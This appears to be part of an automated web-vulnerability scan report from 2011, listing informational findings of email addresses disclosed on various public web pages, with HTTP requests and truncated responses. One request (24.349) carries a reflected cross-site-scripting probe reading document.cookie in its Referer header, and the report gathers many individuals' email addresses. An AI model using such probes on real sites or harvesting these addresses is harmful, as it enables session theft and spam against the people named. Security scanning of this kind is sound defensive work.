   url: 'Ole hyv.. ja anna kelvollinen URL, kuten esimerkiksi http://www.google.fi.',
   currencyDollar: 'Ole hyv.. ja anna kelvollinen eurosumma (kuten esimerkiksi 100,00 EUR) .',
   oneRequired: 'Ole
...[SNIP]...
ecte comme {date}',
   dateInFormatMDY: 'Veuillez saisir une date correcte, au format JJ/MM/AAAA (ex : "31/11/1999").',
   email: 'Veuillez saisir une adresse de courrier électronique. Par example "fred@domaine.com".',
   url: 'Veuillez saisir une URL, comme http://www.google.com.',
   currencyDollar: 'Veuillez saisir une quantité correcte. Par example 100,00€.',
   oneRequired: 'Veuillez sélectionn
...[SNIP]...
...., ...... {date}',
   dateInFormatMDY: '.... .......... .......... ........ ............ MM/DD/YYYY (...... "12/31/1999")',
   email: '.... .......... .......... ............ ........... ............: "fred@domain.com".',
   url: '.... .......... .......... ...... .........., ...... http://www.google.com.',
   currencyDollar: '.... .......... ........ .......... ......... ............ $100.00.',
   oneRequired: '.... ...
...[SNIP]...
um megad..sa sz..ks..ges (pl. {date}).',
   dateInFormatMDY: 'Val..s d..tum megad..sa sz..ks..ges .........HH.NN. form..ban. (pl. "1999.12.31.")',
   email: 'Val..s e-mail c..m megad..sa sz..ks..ges (pl. "fred@domain.hu").',
   url: 'Val..s URL megad..sa sz..ks..ges (pl. http://www.google.com).',
   currencyDollar: 'Val..s p..nz..sszeg megad..sa sz..ks..ges (pl. 100.00 Ft.).',
   oneRequired: 'Az al..bbi mez..k legal..bb e
...[SNIP]...
teSuchAs: 'Inserire una data valida del tipo {date}',
   dateInFormatMDY: 'Inserire una data valida nel formato MM/GG/AAAA (es.: "12/31/1999")',
   email: 'Inserire un indirizzo email valido. Per esempio "nome@dominio.com".',
   url: 'Inserire un indirizzo valido. Per esempio "http://www.dominio.com".',
   currencyDollar: 'Inserire un importo valido. Per esempio "$100.00".',
   oneRequired: 'Completare almeno uno dei campi r
...[SNIP]...
uchAs: 'Vul een geldige datum in, zoals {date}',
   dateInFormatMDY: 'Vul een geldige datum, in het formaat MM/DD/YYYY (bijvoorbeeld "12/31/1999")',
   email: 'Vul een geldig e-mailadres in. Bijvoorbeeld "fred@domein.nl".',
   url: 'Vul een geldige URL in, zoals http://www.google.nl.',
   currencyDollar: 'Vul een geldig $ bedrag in. Bijvoorbeeld $100.00 .',
   oneRequired: 'Vul iets in bij in ieder geval een van deze velde
...[SNIP]...
gyldig dato, som {date}',
   dateInFormatMDY: 'Vennligst skriv inn en gyldig dato, i formatet MM/DD/YYYY (for eksempel "12/31/1999")',
   email: 'Vennligst skriv inn en gyldig epost-adresse. For eksempel "espen@domene.no".',
   url: 'Vennligst skriv inn en gyldig URL, for eksempel http://www.google.no.',
   currencyDollar: 'Vennligst fyll ut et gyldig $ bel....p. For eksempel $100.00 .',
   oneRequired: 'Vennligst fyll ut n
...[SNIP]...
osimy poda.. prawid..ow.. dat.. w formacie: {date}',
   dateInFormatMDY: 'Prosimy poda.. poprawn.. date w formacie DD.MM.RRRR (i.e. "12.01.2009")',
   email: 'Prosimy poda.. prawid..owy adres e-mail, np. "jan@domena.pl".',
   url: 'Prosimy poda.. prawid..owy adres URL, np. http://www.google.pl.',
   currencyDollar: 'Prosimy poda.. prawid..ow.. sum.. w PLN. Dla przyk..adu: 100.00 PLN.',
   oneRequired: 'Prosimy wype..ni..
...[SNIP]...
ateSuchAs: 'Digite uma data v..lida, como {date}',
   dateInFormatMDY: 'Digite uma data v..lida, como DD/MM/YYYY (por exemplo, "31/12/1999")',
   email: 'Digite um endere..o de email v..lido. Por exemplo "nome@dominio.com".',
   url: 'Digite uma URL v..lida. Exemplo: http://www.google.com.',
   currencyDollar: 'Digite um valor em dinheiro v..lido. Exemplo: R$100,00 .',
   oneRequired: 'Digite algo para pelo menos um desses c
...[SNIP]...
s.',
   dateSuchAs: 'Digite uma data v..lida, como {date}',
   dateInFormatMDY: 'Digite uma data v..lida, como DD/MM/YYYY (p.ex. "31/12/1999")',
   email: 'Digite um endere..o de email v..lido. Por exemplo "fred@domain.com".',
   url: 'Digite uma URL v..lida, como http://www.google.com.',
   currencyDollar: 'Digite um valor v..lido $. Por exemplo $ 100,00. ',
   oneRequired: 'Digite algo para pelo menos um desses insumos.',

...[SNIP]...
....... ........ .. .............. ..../..../........ (................ "12/31/1999")',
   email: '...................., .............. .................... ..........-........... ...... .............. "fred@domain.com".',
   url: '...................., .............. .................... ............ ........ http://www.google.com.',
   currencyDollar: '...................., .............. .......... .. ...............
...[SNIP]...
SuchAs: 'Prosim, vnesite pravilen datum kot {date}',
   dateInFormatMDY: 'Prosim, vnesite pravilen datum kot MM.DD.YYYY (primer "12.31.1999")',
   email: 'Prosim, vnesite pravilen email naslov. Na primer "fred@domain.com".',
   url: 'Prosim, vnesite pravilen URL kot http://www.google.com.',
   currencyDollar: 'Prosim, vnesit epravilno vrednost .... Primer 100,00... .',
   oneRequired: 'Prosimo, vnesite nekaj za vsaj eno izm
...[SNIP]...
.tna.',
   dateSuchAs: 'Ange ett giltigt datum som t.ex. {date}',
   dateInFormatMDY: 'Ange ett giltigt datum som t.ex. YYYY-MM-DD (i.e. "1999-12-31")',
   email: 'Ange en giltig e-postadress. Till exempel "erik@domain.com".',
   url: 'Ange en giltig webbadress som http://www.google.com.',
   currencyDollar: 'Ange en giltig belopp. Exempelvis 100,00.',
   oneRequired: 'V..nligen ange minst ett av dessa alternativ.',
   errorPre
...[SNIP]...
........ ........ .. .............. ..../..../........ (.................. "12/31/2009").',
   email: '.............. ................ ............ ...................... .......... (.................. "name@domain.com").',
   url: '.............. ................ ................-.................. (.................. http://www.google.com).',
   currencyDollar: '.............. ........ .. .............. (.............
...[SNIP]...
.......................................{date}...',
   dateInFormatMDY: '..........................................YYYY-MM-DD ("2010-12-31")...',
   email: '................................................"fred@domain.com"...',
   url: '.................. Url ..................http://www.google.com...',
   currencyDollar: '.............................................100.0',
   oneRequired: '........................',
   error
...[SNIP]...
.....................................{date}... ',
   dateInFormatMDY: '..........................................YYYY-MM-DD ("2010-12-31")... ',
   email: '................................................"fred@domain.com"... ',
   url: '..................Url ..................http://www.google.com... ',
   currencyDollar: '.............................................100.0',
   oneRequired: '........................ ',
   err
...[SNIP]...

24.348. http://www.mit.edu/people/jik/software/xrn.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mit.edu
Path:	/people/jik/software/xrn.html

Issue detail

The following email addresses were disclosed in the response:

bug-xrn@kamens.brookline.ma.us
jik@kamens.brookline.ma.us
xrn-users-request@kamens.brookline.ma.us

Request

GET /people/jik/software/xrn.html HTTP/1.1
Host: www.mit.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:01:01 GMT
Server: Apache/1.3.41 (Unix) mod_ssl/2.8.31 OpenSSL/0.9.8j
Last-Modified: Fri, 28 Nov 2008 19:18:35 GMT
ETag: "3d02e6-1ba4-4930440b"
Accept-Ranges: bytes
Content-Length: 7076
Connection: close
Content-Type: text/html

<HTML>

<HEAD>

<TITLE>XRN (X News reader)</TITLE>
<LINK REV="MADE" HREF="mailto:jik@kamens.brookline.ma.us">

</HEAD>

<BODY>

<CENTER>
<H1>XRN -- an X News reader</H1>
</CENTER>

<H2>What is XRN?</H
...[SNIP]...
<A
HREF="mailto:bug-xrn@kamens.brookline.ma.us">bug-xrn@kamens.brookline.ma.us</A>
...[SNIP]...
<A
HREF="mailto:xrn-users-request@kamens.brookline.ma.us">xrn-users-request@kamens.brookline.ma.us</A>
...[SNIP]...

24.349. https://www.mytraderonline.com/javascript/master_s_code.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.mytraderonline.com
Path:	/javascript/master_s_code.js

Issue detail

The following email addresses were disclosed in the response:

id@Ls.tc
kevin.rogers@dominionenterprises.com

Request

GET /javascript/master_s_code.js HTTP/1.1
Host: www.mytraderonline.com
Connection: keep-alive
Referer: https://www.mytraderonline.com/myt8ac25%3Cscript%3Ealert(document.cookie)%3C/script%3E9d5249ed1b2/sign-in/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:07:43 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13 mod_ssl/2.0.63 OpenSSL/0.9.8l
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 32370

/**************************
flicker
***************************/
try {
document.execCommand('BackgroundImageCache', false, true);
} catch(e) {}

function tourWndw() {
var imtTour=wind
...[SNIP]...
***
Includes for s_code condition from nav.templ
*********************************/
/***********************************************/
/*
SiteCatalyst code version: H.17.
Created by Kevin Rogers
kevin.rogers@dominionenterprises.com
01.05.2009
*/
/***********************************************/

var s_account="detraderonline"
var s=s_gi(s_account)
/************************** CONFIG SECTION **************************/
/*
...[SNIP]...
hav()+q+(qs?qs:s."
+"rq(^C)),0,id,ta);qs`e;`Wm('t')`5s.p_r)s.p_r(`R`X`e}^7(qs);^z`p(@i;`l@i`L^9,`G$71',vb`R@G=^D=s.`N`i=s.`N^M=`F@0^y=s.ppu=^p=^pv1=^pv2=^pv3`e`5$x)`F@0@G=`F@0eo=`F@0`N`i=`F@0`N^M`e`5!id@Ls.tc#Ctc=1;s.f"
+"lush`a()}`2$m`Atl`0o,t,n,vo`1;s.@G=@wo`R`N^M=t;s.`N`i=n;s.t(@i}`5pg){`F@0co`0o){`K@J\"_\",1,#B`2@wo)`Awd@0gs`0$S{`K@J$p1,#B`2s.t()`Awd@0dc`0$S{`K@J$p#B`2s.t()}}@3=(`F`J`Y`8`4@us@d0`Rd=^L
...[SNIP]...

24.350. http://www.netlingo.com/acronyms.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/acronyms.php

Issue detail

The following email address was disclosed in the response:

info@netlingo.com

Request

GET /acronyms.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:44:43 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 229925

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<A href="mailto:info@netlingo.com?Subject=Acronym/Shorthand suggestion">
...[SNIP]...

24.351. http://www.netlingo.com/add-edit/editor-guidelines.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/add-edit/editor-guidelines.php

Issue detail

The following email address was disclosed in the response:

info@netlingo.com

Request

GET /add-edit/editor-guidelines.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:52:02 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 39414

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<a href="mailto:info@netlingo.com?subject=PDF submission">info@netlingo.com</a>
...[SNIP]...

24.352. http://www.netlingo.com/contact/contact-us.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/contact/contact-us.php

Issue detail

The following email address was disclosed in the response:

info@netlingo.com

Request

GET /contact/contact-us.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:00:17 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 34733

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<a href="mailto:info@netlingo.com?Subject=Inquiry from Contact Us page Erin">info@netlingo.com</a>
...[SNIP]...

24.353. http://www.netlingo.com/contact/linktonetlingo.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/contact/linktonetlingo.php

Issue detail

The following email address was disclosed in the response:

info@netlingo.com

Request

GET /contact/linktonetlingo.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:00:25 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 37791

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<a href="mailto:info@netlingo.com?Subject=Reciprocal%20link%20idea%20Erin">
...[SNIP]...
<a href="mailto:info@netlingo.com?Subject=Dictionary%20link%20idea%20Erin">
...[SNIP]...
<a href="mailto:info@netlingo.com?Subject=Resource%20link%20idea%20Erin">
...[SNIP]...
<a href="mailto:info@netlingo.com?Subject=Paid%20link%20idea%20Erin">
...[SNIP]...

24.354. http://www.netlingo.com/scripts/jquery.bookmark.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/scripts/jquery.bookmark.js

Issue detail

The following email address was disclosed in the response:

kbwood@virginbroadband.com.au

Request

GET /scripts/jquery.bookmark.js HTTP/1.1
Host: www.netlingo.com
Proxy-Connection: keep-alive
Referer: http://www.netlingo.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:02:02 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 04 Nov 2008 18:37:54 GMT
ETag: "3677c5-315c-5c912480"
Accept-Ranges: bytes
Content-Length: 12636
Connection: close
Content-Type: application/x-javascript

/* http://keith-wood.name/bookmark.html
Sharing bookmarks for jQuery v1.0.2.
Written by Keith Wood (kbwood@virginbroadband.com.au) March 2008.
Dual licensed under the GPL (http://dev.jquery.com/browser/trunk/jquery/GPL-LICENSE.txt) and
MIT (http://dev.jquery.com/browser/trunk/jquery/MIT-LICENSE.txt) licenses.
Pleas
...[SNIP]...

24.355. http://www.netlingo.com/scripts/jquery.dimensions.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/scripts/jquery.dimensions.js

Issue detail

The following email addresses were disclosed in the response:

brandon.aaron@gmail.com
paul.bakaus@googlemail.com

Request

GET /scripts/jquery.dimensions.js HTTP/1.1
Host: www.netlingo.com
Proxy-Connection: keep-alive
Referer: http://www.netlingo.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:02:02 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 04 Nov 2008 18:37:54 GMT
ETag: "3677c7-8bf-5c912480"
Accept-Ranges: bytes
Content-Length: 2239
Connection: close
Content-Type: application/x-javascript

/* Copyright (c) 2007 Paul Bakaus (paul.bakaus@googlemail.com) and Brandon Aaron (brandon.aaron@gmail.com || http://brandonaaron.net)
* Dual licensed under the MIT (http://www.opensource.org/licenses/mit-license.php)
* and GPL (http://www.opensource.org/licenses/gpl-license.php) licenses.
*
* $LastCha
...[SNIP]...

24.356. http://www.netlingo.com/scripts/jquery.mousewheel.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/scripts/jquery.mousewheel.js

Issue detail

The following email address was disclosed in the response:

brandon.aaron@gmail.com

Request

GET /scripts/jquery.mousewheel.js HTTP/1.1
Host: www.netlingo.com
Proxy-Connection: keep-alive
Referer: http://www.netlingo.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:02:02 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 04 Nov 2008 18:37:55 GMT
ETag: "3677ca-6f5-5ca066c0"
Accept-Ranges: bytes
Content-Length: 1781
Connection: close
Content-Type: application/x-javascript

/* Copyright (c) 2006 Brandon Aaron (brandon.aaron@gmail.com || http://brandonaaron.net)
* Dual licensed under the MIT (http://www.opensource.org/licenses/mit-license.php)
* and GPL (http://www.opensource.org/licenses/gpl-license.php) licenses.
* Thanks to:
...[SNIP]...

24.357. http://www.networkworld.com/community/blog/ebay-use-joomla-open-source-glue previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.networkworld.com
Path:	/community/blog/ebay-use-joomla-open-source-glue

Issue detail

The following email address was disclosed in the response:

jbort@nww.com

Request

Response

24.358. http://www.networkworld.com/news/2010/100710-ebay-deploys-joomla-for-analytics.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.networkworld.com
Path:	/news/2010/100710-ebay-deploys-joomla-for-analytics.html

Issue detail

The following email address was disclosed in the response:

Joab_Jackson@idg.com

Request

Response

24.359. http://www.noreastermagazine.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.noreastermagazine.com
Path:	/

Issue detail

The following email address was disclosed in the response:

noreastermag@gmail.com

Request

GET / HTTP/1.1
Host: www.noreastermagazine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:08:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
Set-Cookie: 7f17775ebaca27b049989f22de967fcd=8770a74d6eac2afa63076869bfca0779; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 00:08:30 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 5572
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir="
...[SNIP]...
<p>
Nor'easter Magazine has suspended the publishing of the print magazine and
it's website as of the end of business July 31, 2010.

If you have any questions, please email us at noreastermag@gmail.com </p>
...[SNIP]...

24.360. http://www.opensource.org/licenses/bsd-license.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.opensource.org
Path:	/licenses/bsd-license.php

Issue detail

The following email addresses were disclosed in the response:

osi@opensource.org
webmaster@opensource.org

Request

GET /licenses/bsd-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

24.361. http://www.opensource.org/licenses/gpl-license.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.opensource.org
Path:	/licenses/gpl-license.php

Issue detail

The following email addresses were disclosed in the response:

osi@opensource.org
webmaster@opensource.org

Request

GET /licenses/gpl-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:08:43 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/0.9.8n DAV/2 SVN/1.6.15
Set-Cookie: SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=4iogpts99t9ivnkufvcubm4sb4; expires=Thu, 17-Feb-2011 03:42:03 GMT; path=/; domain=.opensource.org
Last-Modified: Tue, 25 Jan 2011 00:02:12 GMT
ETag: "c78bed29e3c1e7584db2cae96691f4e3"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Content-Length: 7271
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<a href="mailto:osi@opensource.org">
...[SNIP]...
<a href="mailto:webmaster@opensource.org">
...[SNIP]...

24.362. http://www.opensource.org/licenses/mit-license.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.opensource.org
Path:	/licenses/mit-license.php

Issue detail

The following email addresses were disclosed in the response:

osi@opensource.org
webmaster@opensource.org

Request

GET /licenses/mit-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

24.363. http://www.openusenet.org/diablo/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.openusenet.org
Path:	/diablo/

Issue detail

The following email address was disclosed in the response:

LISTNAME-request@openusenet.org

Request

GET /diablo/ HTTP/1.1
Host: www.openusenet.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:01:18 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch
Last-Modified: Tue, 27 Oct 2009 10:23:15 GMT
ETag: "138007-1108-476e810e86ac0"
Accept-Ranges: bytes
Content-Length: 4360
Connection: close
Content-Type: text/html

<html>
<head><title>Diablo Usenet Software</title></head>
<body bgcolor="#ffffff">
<center>
<h2>Diablo Usenet Software</h2>
<h4>Welcome to the home of Diablo - newsfeeding and newsreading server softw
...[SNIP]...
<b>LISTNAME-request@openusenet.org</b>
...[SNIP]...

24.364. http://www.ossp.org/pkg/tool/lmtp2nntp/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ossp.org
Path:	/pkg/tool/lmtp2nntp/

Issue detail

The following email addresses were disclosed in the response:

ossp-donation@ossp.org
ossp@ossp.org
rse@engelschall.com
thomas@lotterer.net

Request

GET /pkg/tool/lmtp2nntp/ HTTP/1.1
Host: www.ossp.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:03:46 GMT
Server: Apache/2.2.8 (OpenPKG/CURRENT)
Last-Modified: Mon, 31 Mar 2008 22:42:38 GMT
ETag: "60600e-8281-449c35e657380"
Accept-Ranges: bytes
Content-Length: 33409
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<link rel="ICON" href="../../../SHARE/ossp_img/ossp-icon.ico">
<link rel="SHORTCUT ICON" href="../../../SHARE/ossp_img/o
...[SNIP]...

...[SNIP]...
<meta name="Author" content="OSSP, ossp@ossp.org">
...[SNIP]...
<a href="mailto:thomas@lotterer.net">thomas@lotterer.net</a>
...[SNIP]...
<a href="mailto:rse@engelschall.com">rse@engelschall.com</a>
...[SNIP]...
<input type="hidden" name="business" value="ossp-donation@ossp.org">
...[SNIP]...

24.365. https://www.paperg.com/post.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.paperg.com
Path:	/post.php

Issue detail

The following email address was disclosed in the response:

young@jtmarlin.com

Request

Response

24.366. http://www.playshakespeare.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.playshakespeare.com
Path:	/

Issue detail

The following email address was disclosed in the response:

cadams@playshakespeare.com

Request

GET / HTTP/1.1
Host: www.playshakespeare.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:15:11 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: eab80364d83027bfc601e73262603d25=341187f485832c9a1355235ffc880801; path=/
Last-Modified: Mon, 24 Jan 2011 15:15:14 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 180908

<?xml version="1.0"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns=
...[SNIP]...
<p>If you have any questions/comments, feel free to e-mail me at cadams@playshakespeare.com</p>
...[SNIP]...

24.367. http://www.positioniseverything.net/easyclearing.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.positioniseverything.net
Path:	/easyclearing.html

Issue detail

The following email address was disclosed in the response:

johnthebig66@yahoo.com

Request

GET /easyclearing.html HTTP/1.1
Host: www.positioniseverything.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:28:28 GMT
Server: Apache/1.3.41 (Unix) mod_ssl/2.8.31 OpenSSL/0.9.8a
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 24290

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>

<title>Clearing a float container without source markup</title>

<meta http-equiv
...[SNIP]...
<a href="mailto:johnthebig66@yahoo.com">
...[SNIP]...

24.368. http://www.pwc-traderonline.com/research/resources/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pwc-traderonline.com
Path:	/research/resources/

Issue detail

The following email address was disclosed in the response:

advertising@pwc-traderonline.com

Request

GET /research/resources/ HTTP/1.1
Host: www.pwc-traderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

24.369. http://www.pwc-traderonline.com/sell/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pwc-traderonline.com
Path:	/sell/

Issue detail

The following email address was disclosed in the response:

customerservice@cycletrader.com

Request

GET /sell/ HTTP/1.1
Host: www.pwc-traderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

24.370. http://www.rdrop.com/users/billmc/adcomplain.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.rdrop.com
Path:	/users/billmc/adcomplain.html

Issue detail

The following email address was disclosed in the response:

billmc@agora.rdrop.com

Request

GET /users/billmc/adcomplain.html HTTP/1.1
Host: www.rdrop.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:15:07 GMT
Server: Apache/1.3.20 (Unix) mod_jk mod_ssl/2.8.4 OpenSSL/0.9.6
Last-Modified: Wed, 16 May 2001 16:52:58 GMT
ETag: "4520-57b-3b02b06a"
Accept-Ranges: bytes
Content-Length: 1403
Connection: close
Content-Type: text/html

<HTML><HEAD><TITLE>Adcomplain Home Page</TITLE>
